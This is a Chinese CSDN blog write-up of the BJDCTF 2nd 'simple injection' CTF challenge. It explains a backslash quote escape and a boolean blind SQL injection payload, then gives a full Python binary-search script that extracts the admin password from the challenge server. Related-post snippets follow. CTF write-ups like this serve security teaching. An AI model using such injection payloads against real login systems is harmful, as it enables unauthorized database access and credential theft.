[BJDCTF 2nd]简单注入

最新推荐文章于 2021-04-28 17:28:01 发布
最新推荐文章于 2021-04-28 17:28:01 发布
阅读量198 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113774753
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

[BJDCTF 2nd]简单注入

考点:盲注

启动:在这里插入图片描述拿到题目,先扫一下目录
发现有robots.txt,里面提示了一个hint.txt。访问hint.txt在这里插入图片描述
有一条后台查询语句:select * from users where username='$_POST["username"]' and password='$_POST["password"]';
应该有注入点

回到登入框处,尝试注入,发现加单双引号都被过滤在这里插入图片描述fuzz一下在这里插入图片描述

长度为1414的都被过滤,包括select,and,=,等。
很明显联合注入用不了,报错注入无回显也不行。考虑盲注。
当username=admin&password=or 1#
时可引发盲注
在这里插入图片描述
select * from users where username='admin\' and password='or 1#';
这时的后台语句变成这样的,用反斜杠转义username后面那个单引号,所以username的第一个单引号只能与password的第一个单引号闭合,最后一个单引号被注释,所以or后面那块就可以由我们自由发挥了。

举个例子:

如果传入`username=admin\ password=123456#`
就会变成
`select * from users where username='admin\' and password='123456#';`
可以理解为
select * from users where username='admin and password=' 恶意代码 #';

在这里因为限制比较多,直接查数据库里的表列内容比较难,我们可以直接查password的值。

这题的爆表的姿势怎么说呢。。就是直接对username和password这两个列进行操作,自己之前不知道可以直接对列操作,以为必须要select才可以。在前面已经FROM users的情况下,是可以执行对列进行操作的,因此可以直接爆列的内容。

读取password的值:username=admin\&password=or(ascii(substr(password,{},1))>0)#

发现有不同回显,所以方法可行,使用脚本跑一下

上脚本,因为 = 号也被过滤了,只能用>,不能爆破,只能用二分法:

脚本如下:

import requests

url='http://5359b7aa-506f-4bbc-a401-dde18a3754e9.node3.buuoj.cn'
flag=''

for i in range(1, 30):
    high=128
    low=32
    mid=(high+low)//2
    while low<high:
        payload = "or(ascii(substr(password,{},1))>{})#".format(i, mid)
        data = {"username": "admin\\", "password": payload}
        re = requests.post(url, data=data)
        if "stronger" in re.text:
            low=mid+1
        else :
            high=mid
        mid=(high+low)//2
    if (low == 32 or high == 128):
        break
    flag += chr(mid)
    print(flag)

在这里插入图片描述
运行脚本获得password,username也可以这样获取,但是试了试发现username就是admin

跑出密码后用admin登入即可获得flag
在这里插入图片描述

无尽星河-深空
关注
专栏目录
[BJDCTF 2nd]简单注入 -wp
freerats的博客
07-17 554
拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。 select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 有一条后台查询语句 回到登入框处,尝试注入,发现加单双引号都被过滤 fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入用不了,报错注入无回显也不行。考虑盲注。 当username=admin&a.
BUUCTF__[BJDCTF 2nd]fake google_题解
风过江南乱的博客
07-16 794
SSTI/沙盒逃逸详细总结 SSTI模板注入 服务端模板注入攻击
[BJDCTF 2nd]简单注入---关于整数型注入的一些理解
StevenOnesir的博客
12-30 354
本次以BJDCTF的题目,简单对整数型注入做一些讲解。 首先进入界面: 看到的是比较友善的登录界面,考虑题目名称为简单注入,我们直接在密码栏输入 ',发现被过滤。 因此开始考虑整数型注入。 既然闭合了引号防止闭合,这里我们可以猜测后端代码,结合用户名输入进行注入。 在用户名中输入\,可以过滤掉用户名处的最后一个',这是password='这部分的第一个引号将会作为前面字符段的闭合,就可以构造整数型注入。 我们构建第一个payload: username=a password=1 or length(da
BJDCTF 2nd(WEB复现)
ChenZIDu的博客
04-02 882
记录一下,以后忘记了还能看看 fake google-飞机票 duangShell .index.php.swp源码泄露 一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。 因为exec()无回显,而且没有禁curl。所以可以反弹shell~~ ...
-----已搬运-------[BJDCTF 2nd]:文件探测 -- springf()注入漏洞 ---PHP伪协议文件读取 ---ssrf ----PHP代码审计----session密码算法绕过
Zero_Adam的博客
03-15 244
访问网页的时候,后面用#这个定位符可以使得后面的内容失效。 也可以用参数的形式使其失效 比如: q2必须以http://127.0.0.1/开头,不能包含flag顺序出现的字符,后面会拼接y1ng.txt,我们用#注释掉拼接信息,即传入参数http://127.0.0.1/admin.php#,最后执行http://127.0.0.1/admin.php#.y1ng.txt,或者用http://127.0.0.1/admin.php?,最后执行http://127.0.0.1/admin.php?.y1ng
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1621
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
[BJDCTF 2nd]简单注入 详细wp
weixin_45887311的博客
07-28 711
又开始刷SQL注入的题目,从这道简单注入下手 首先没找到提示。。。。。。最后看了一下wp才发现有个hint.txt 有后端语句比较好构造了,结果又过滤,要fuzz探测一下 发现select还有 ' "都被过滤了 幸好空格和反斜杠没有被过滤。。。。 fuzz.txt (可以自己添加) select from ascii substr table column by schema where extractvalue exp if / ( ) % ! @ # $ ^ &...
[BJDCTF 2nd]简单注入(过滤了引号,利用\逃逸sql语句第二字段)
qq_45521281的博客
04-28 1381
进入后页面: 看看后台用什么闭合的,测试单引号: 发现直接就给你过滤了。试试还过滤了什么,发现过滤了以下指令: (这个方法挺巧的) union , select , = , ' , & , && , - , " , and 连引号都过滤了,这可怎么做啊。 看看又什么提示,源码里面啥也没有,扫描一下发现robots.txt: 发现了hint.txt提示,访问看看: ...
[BJDCTF 2nd]简单注入【Bool+Regexp注入
D.MIND 的博客
04-28 471
这道题跟之前做的 [NCTF2019]SQLi 十分相像,不过之前写的盲注脚本不大好,没有区分大小写 文章目录Regexp注入布尔盲注脚本 首先fuzz一下,主要过滤了union、select 、单引号、双引号、if、=、like 但是值得庆幸空格、or、注释符 没被过滤(虽然过滤了也能绕) 本题有个hint可以通过robots.txt发现 Only u input the correct password then u can get the flag and p3rh4ps wants a girl f
[BJDCTF 2nd]文件探测
feng的博客
12-19 486
知识点 HTTP响应头 文件包含 代码审计 SSRF sprintf格式化漏洞 session绕过 WP 一道综合性很强的题目,真的很有意思,自己做的时候状态太差连文件包含都没弄出来,实在是太菜了,还是要加油。不过这题真的可以学到很多知识,very nice。 首先进入环境,f12拉到最下面可以看到提示: 看了一下,BJDCTF的传统header里藏东西,看一下header,发现了hint: 除此之外,尝试一下robots.txt: 可以发现admin.php,flag.php是不存在的。 进入h
BJDCTF 2nd secret
seaaseesa的博客
04-09 655
BJDCTF 2nd secret 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 是一个猜数游戏,数值全在代码里,但是有10000个,显然全部抠出来太慢了。 我们再看一下其他函数,发现输入name时,存在缓冲区溢出,可以改写0x000000000046D090处的指针,而该处指针指向count变量,每猜一下,就会对count减1。 然后,我们注意到printf...
BJDCTF2nd
Amherstieae的博客
05-25 1155
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3157
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
Pro Puppet 2nd:开源系统配置管理指南
《Pro Puppet 2nd》是一本专注于介绍Puppet,一个开源的系统配置管理框架和技术工具集的英文原版书籍。该书主要针对IT专业人员,旨在帮助读者深入了解如何利用Puppet来管理和维护计算机系统的配置。全书共分为12章,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值